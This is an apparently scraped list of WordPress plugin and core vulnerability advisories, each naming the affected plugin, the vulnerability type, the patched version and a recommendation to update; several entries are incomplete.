Vulnerability: Authenticated (Author+) SQL Injection via addCountS
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE

Vulnerability: Gutenberg Blocks <= 2.2.5
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Order date, Order pickup, Order date time, Pickup Location, delivery date for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.0.20
Recommended Action: Update to version 3.0.20, or a newer patched version

Plugin: Delete Post Revisions In WordPress

Plugin: Table Field Add-on for SCF and ACF

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.1.13
Recommended Action: Update to version 1.1.13, or a newer patched version

Plugin: WooCommerce Builder & Gutenberg WooCommerce Blocks – WowStore

Vulnerability: Missing Authorization via option_data_save
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Web Invoice – Invoicing and billing for WordPress

Plugin: WP Synchro – WordPress Migration Plugin for Database & Files

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.10.0
Recommended Action: Update to version 1.10.0, or a newer patched version

Plugin: Custom Content Type Manager

Vulnerability: 0.9.8.8
Patched Version: 0.9.8.9
Recommended Action: Update to version 0.9.8.9, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 6.9.19
Recommended Action: Update to version 6.9.19, or a newer patched version

Plugin: Retro Winamp Block

Vulnerability: Denial of Service
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: surveys

Plugin: Deeper Comments

Vulnerability: Missing Authorization to Authenticated(Subscriber+) Arbitrary Options Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Chop Slider 3

Plugin: timelineoptinpro

Plugin: User Email Verification for WooCommerce

Plugin: filedownload

Vulnerability: Open Proxy
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Missing Authorization to Information Disclosure
Patched Version: 5.11
Recommended Action: Update to version 5.11, or a newer patched version

Plugin: CMP – Coming Soon & Maintenance Plugin by NiteoThemes

Vulnerability: Missing Authorization
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated(Shop Manager+) Sensitive Information Exposure
Patched Version: 7.0.1
Recommended Action: Update to version 7.0.1, or a newer patched version

Plugin: Premium Addons Pro for Elementor

Vulnerability: Sensitive Information Exposure
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: Asset Manager

Plugin: Easy Digital Downloads – Free Downloads

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: NewsPlugin

Vulnerability: No subtitle
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: bbPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via the forums list table
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: o2s gallery

Plugin: Ceceppa Multilingua

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 7.1.0
Recommended Action: Update to version 7.1.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Customizer
Patched Version: 3.7.21
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.21, 3.8.21, 3.9.19, 4.0.18, 4.1.18, 4.2.15, 4.3.11, 4.4.10, 4.5.9, 4.6.6, 4.7.5

Plugin: Pricing Table Plugin

Vulnerability: < 2.3
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.9.8
Recommended Action: Update to version 5.9.8, or a newer patched version

Plugin: Ivory Search – WordPress Search Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.7
Recommended Action: Update to version 4.7, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 6.5.2
Recommended Action: Update to version 6.5.2, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: .53.4
Recommended Action: Update to version .53.4, or a newer patched version

Plugin: Timely All-in-One Events Calendar

Vulnerability: SQL Injection
Patched Version: 1.10
Recommended Action: Update to version 1.10, or a newer patched version

Plugin: Gravity Forms

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Directory Traversal
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: DTracker

Plugin: Sell Downloads

Vulnerability: Improper Input Validation
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Bravo Translate

Plugin: Flexi Quote Rotator

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Amazon Link

Core: WordPress

Vulnerability: Arbitrary Email Content Change
Patched Version: 1.5.1.3
Recommended Action: Update to version 1.5.1.3, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Contact Form Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: CP Contact Form with PayPal

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.02
Recommended Action: Update to version 1.3.02, or a newer patched version

Plugin: Front-end Editor

Vulnerability: Arbitrary File Upload
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: WP Clictracker

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery to Remote Code Execution
Patched Version: 3.6.4
Recommended Action: Update to version 3.6.4, or a newer patched version

Plugin: Ni WooCommerce Custom Order Status

Vulnerability: SQL Injection
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: JW Player for Flash & HTML5 Video

Plugin: Custom Post Type UI

Vulnerability: Cross-Site Request Forgery to Sensitive Information Exposure
Patched Version: 1.13.5
Recommended Action: Update to version 1.13.5, or a newer patched version

Plugin: Post Grid and Gutenberg Blocks – ComboBlocks

Vulnerability: Arbitrary File Deletion
Patched Version: 2.0.13
Recommended Action: Update to version 2.0.13, or a newer patched version

Plugin: Hermit 音乐播放器

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Authenticated (Admin+) Server-Side Request Forgery
Patched Version: 5.5.5
Recommended Action: Update to version 5.5.5, or a newer patched version

Plugin: SoundCloud Is Gold

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: WP Booking System – Booking Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.15
Recommended Action: Update to version 2.0.15, or a newer patched version

Plugin: Freesoul Deactivate Plugins – Disable plugins on individual WordPress pages

Vulnerability: Cross-Site Request Forgery via eos_dp_pro_delete_transient
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Clearpay Gateway for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.13.40
Recommended Action: Update to version 1.13.40, or a newer patched version

Plugin: WPC Smart Wishlist for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.9
Recommended Action: Update to version 2.9.9, or a newer patched version

Plugin: Flat Preloader

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: WP User Merger

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Reflected Cross-Site Scripting via ppress_cc_data Parameter
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Cross-Site Request Forgery
Patched Version: 21.2.9
Recommended Action: Update to version 21.2.9, or a newer patched version

Plugin: weForms – Easy Drag & Drop Contact Form Builder For WordPress

Vulnerability: Missing Authorization via export_form_entries
Patched Version: 1.6.19
Recommended Action: Update to version 1.6.19, or a newer patched version

Plugin: Manual Purchases Add-on for iThemes Exchange

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.3.7
Recommended Action: Update to version 7.3.7, or a newer patched version

Plugin: WP Config File Editor

Plugin: Adaptive Images for WordPress

Vulnerability: Local File Inclusion
Patched Version: 0.6.67
Recommended Action: Update to version 0.6.67, or a newer patched version

Plugin: WP-MUI – Mass User Input – Add and Export WP Users Quickly

Plugin: GD Star Rating

Plugin: Frontend File Manager Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Arbitrary File Upload
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: Simple Social Media Share Buttons – Social Sharing for Everyone

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Memphis Documents Library

Vulnerability: Arbitrary File Download
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Booking.com Banner Creator

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Simple History – Track, Log, and Audit WordPress Changes

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Missing Authorization in ‘queue_posts’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Responsive WordPress Slider

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Stored Cross-Site Scripting
Patched Version: 5.2.3
Recommended Action: Update to version 5.2.3, or a newer patched version

Plugin: UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WP

Vulnerability: Subscriber+ User Avatar Override
Patched Version: 1.2.3.1
Recommended Action: Update to version 1.2.3.1, or a newer patched version

Plugin: WordPress Ad Widget

Vulnerability: Local File Inclusion
Patched Version: 2.12.0
Recommended Action: Update to version 2.12.0, or a newer patched version

Plugin: Jetpack VaultPress

Vulnerability: Remote Code Execution
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Add Link to Facebook

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Authenticated (Submitter+) Arbitrary File Deletion
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: Mmm Simple File List

Vulnerability: Authenticated (Subscriber+) Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Themesflat Addons For Elementor

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: OAuth 2.0 client for SSO

Vulnerability: Authentication Bypass
Patched Version: 1.11.4
Recommended Action: Update to version 1.11.4, or a newer patched version

Plugin: Starbox Voting

Plugin: Guest posting / Frontend Posting wordpress plugin – WP Front User Submit / Front Editor

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘saveRedirectSettings’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.20
Recommended Action: Update to version 1.9.20, or a newer patched version

Plugin: SEUR Oficial

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Carousel, Slider, Gallery by WP Carousel – Image Carousel with Lightbox & Photo Gallery, Video Slider, Post Carousel & Post Grid, Product Carousel & Product Grid

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: Mailster WordPress Newsletter Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.4.9
Recommended Action: Update to version 2.4.9, or a newer patched version

Plugin: Genie WP Favicon

Plugin: Portfolio Gallery – Photo Gallery

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Cross-Site Scripting
Patched Version: 14.0.0
Recommended Action: Update to version 14.0.0, or a newer patched version

Plugin: Sign-up Sheets

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: All-in-One WP Migration and Backup

Vulnerability: Unauthenticated Backup Download
Patched Version: 7.15
Recommended Action: Update to version 7.15, or a newer patched version

Plugin: NextScripts: Social Networks Auto-Poster

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2.8
Recommended Action: Update to version 4.2.8, or a newer patched version

Plugin: JetFormBuilder — Dynamic Blocks Form Builder

Vulnerability: Cross-Site Request Fogery via ‘do_admin_action’
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated Privilege Escalation via Profile Update
Patched Version: 2.1.12
Recommended Action: Update to version 2.1.12, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.127.4
Recommended Action: Update to version 5.127.4, or a newer patched version

Plugin: Absolute Privacy

Vulnerability: Cross-Site Request Forgery to User Email/Password Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FAQ / Accordion / Docs / KB – Helpie WordPress FAQ Accordion plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.9
Recommended Action: Update to version 1.9.9, or a newer patched version

Plugin: Brizy – Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via Element Content
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Cyberus Key

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Event Calendar WD version

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.22
Recommended Action: Update to version 1.1.22, or a newer patched version

Plugin: Maspik – Advanced Spam Protection

Vulnerability: Bypass
Patched Version: 0.10.4
Recommended Action: Update to version 0.10.4, or a newer patched version

Plugin: MailerLite – Signup forms (official)

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Google Authenticator

Vulnerability: Improper Authentication
Patched Version: 0.48
Recommended Action: Update to version 0.48, or a newer patched version

Plugin: Smart Google Code Inserter

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: Contact Form 7 – Clockwork SMS

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Cross-Site Request Forgery to Arbitrary Listing Export
Patched Version: 5.11.2
Recommended Action: Update to version 5.11.2, or a newer patched version

Plugin: Download Manager

Vulnerability: Authenticated (Contributor+) Arbitrary File Deletion
Patched Version: 3.2.51
Recommended Action: Update to version 3.2.51, or a newer patched version

Plugin: Regpack

Plugin: Multi Rating

Vulnerability: Missing Authorization to Arbitrary Ratings Value Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Zillow Review Slider

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Ecwid by Lightspeed Ecommerce Shopping Cart

Vulnerability: Missing Authorization on multiple functions
Patched Version: 6.12.4
Recommended Action: Update to version 6.12.4, or a newer patched version

Plugin: Editorial Calendar

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via edcal_saveoptions AJAX action
Patched Version: 3.8.1
Recommended Action: Update to version 3.8.1, or a newer patched version

Plugin: Email Templates Customizer and Designer for WordPress and WooCommerce

Vulnerability: Cross-Site Request Forgery via send_test_email
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Post Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.6.4
Recommended Action: Update to version 3.6.4, or a newer patched version

Plugin: Support Board

Vulnerability: Multiple Unauthenticated SQL Injections
Patched Version: 3.3.4
Recommended Action: Update to version 3.3.4, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Arbitrary WordPress Shortcode Injection
Patched Version: 3.0.32
Recommended Action: Update to version 3.0.32, or a newer patched version

Plugin: Mail logging – WP Mail Catcher

Vulnerability: WP Mail Catcher <= 2.1.3
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Ultimate WP Query Search Filter

Vulnerability: Authenticated (Contributor+) Stored Cross Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Echo Sign

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Core: WordPress

Vulnerability: Spam Embed on Multisite Installations
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: Advanced Custom Fields (ACF)

Vulnerability: 6.1.7
Patched Version: 6.1.8
Recommended Action: Update to version 6.1.8, or a newer patched version

Plugin: Car Rental System

Plugin: WP Social Buttons

Vulnerability: Admin+ Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Email Newsletter

Plugin: The Holiday Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 1.11.3
Recommended Action: Update to version 1.11.3, or a newer patched version

Plugin: IMPress Listings

Plugin: LightStart – Maintenance Mode, Coming Soon and Landing Page Builder

Vulnerability: Missing Authorization Checks & Cross-Site Request Forgery
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: Spiffy Calendar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.9.6
Recommended Action: Update to version 4.9.6, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Innovs HR – Complete Human Resource Management System for Your Business

Plugin: Efí Bank

Vulnerability: Missing Authorization
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Debug Assistant

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: Push Notifications for WordPress by PushAssist

Plugin: Product Table for WooCommerce by CodeAstrology (wooproducttable.com)

Vulnerability: Missing Authorization
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: GDPR Cookie Consent Notice Box

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Password Reset with Code for WordPress REST API

Vulnerability: Weak Password Recovery Mechanism
Patched Version: 0.0.16
Recommended Action: Update to version 0.0.16, or a newer patched version

Plugin: Print My Blog – Print, PDF, & eBook Converter WordPress Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Popup by Supsystic

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 1.10.20
Recommended Action: Update to version 1.10.20, or a newer patched version

Plugin: Import XML and RSS Feeds

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: CSV Injection
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Simple Sitemap – Create a Responsive HTML Sitemap

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: Border Loading Bar

Plugin: CopySafe Web Protection

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Username Enumeration
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Asset CleanUp: Page Speed Booster

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.8.5
Recommended Action: Update to version 1.3.8.5, or a newer patched version

Plugin: FormCraft – Form Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Parsi Date

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Light Messages

Core: WordPress

Vulnerability: Cross-Site Scripting via Name and Version Header of Plugin
Patched Version: 3.7.17
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.17, 3.8.17, 3.9.15, 4.0.14, 4.1.14, 4.2.11, 4.3.7, 4.4.6, 4.5.5, 4.6.2, 4.7.1

Plugin: EZPZ One Click Backup

Plugin: Booster Elite for WooCommerce

Vulnerability: Missing Authorization to Order Information Disclosure
Patched Version: 7.1.2
Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: DPD Baltic Shipping

Vulnerability: Missing Authorization to Arbitrary Options Deletion
Patched Version: 1.2.57
Recommended Action: Update to version 1.2.57, or a newer patched version

Plugin: Post Grid, Slider & Carousel Ultimate – with Shortcode, Gutenberg Block & Elementor Widget

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: MoolaMojo

Plugin: Thumbnail carousel slider

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Advanced Woo Search

Vulnerability: Cross-Site Scripting
Patched Version: 1.70
Recommended Action: Update to version 1.70, or a newer patched version

Plugin: Profile Builder Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.10.1
Recommended Action: Update to version 3.10.1, or a newer patched version

Plugin: WP User Control

Vulnerability: Insecure Password Reset Mechanism
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery Bank – WordPress Photo Gallery Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.20
Recommended Action: Update to version 2.0.20, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Reflected Cross-Site Scripting via extension
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: WP Dummy Content Generator

Vulnerability: Missing Authorization
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.7.2
Recommended Action: Update to version 2.1.7.2, or a newer patched version

Plugin: Upload File Type Settings Plugin

Plugin: Pinpoint Booking System – #1 WordPress Booking Plugin

Vulnerability: Cross-Site Request Forgery via initBackEndAJAX
Patched Version: 2.9.9.4.1
Recommended Action: Update to version 2.9.9.4.1, or a newer patched version

Plugin: XO Event Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: Kaya QR Code Generator

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via qrCode attribute
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Fraud Prevention For WooCommerce and EDD

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: MailChimp Forms by MailMunch

Vulnerability: Cross-Site Request Forgery via Multiple AJAX actions
Patched Version: 3.1.8
Recommended Action: Update to version 3.1.8, or a newer patched version

Core: WordPress

Vulnerability: 2.0.5
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: <= 3.2.4
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: WP Activity Log

Vulnerability: Missing Capabilities Check to User Enumeration
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.17.2
Recommended Action: Update to version 3.17.2, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.46
Recommended Action: Update to version 2.9.46, or a newer patched version

Plugin: Knews Multilingual Newsletters

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Sabai Discuss

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.14
Recommended Action: Update to version 1.4.14, or a newer patched version

Plugin: WordPress Portfolio Plugin – A Plugin for Making Filterable Portfolio Grid, Portfolio Slider and more

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Unauthenticated Arbitrary Options Deletion
Patched Version: 5.5
Recommended Action: Update to version 5.5, or a newer patched version

Plugin: Premmerce User Roles

Vulnerability: Missing Authorization via role management functions
Patched Version: 1.0.13
Recommended Action: Update to version 1.0.13, or a newer patched version

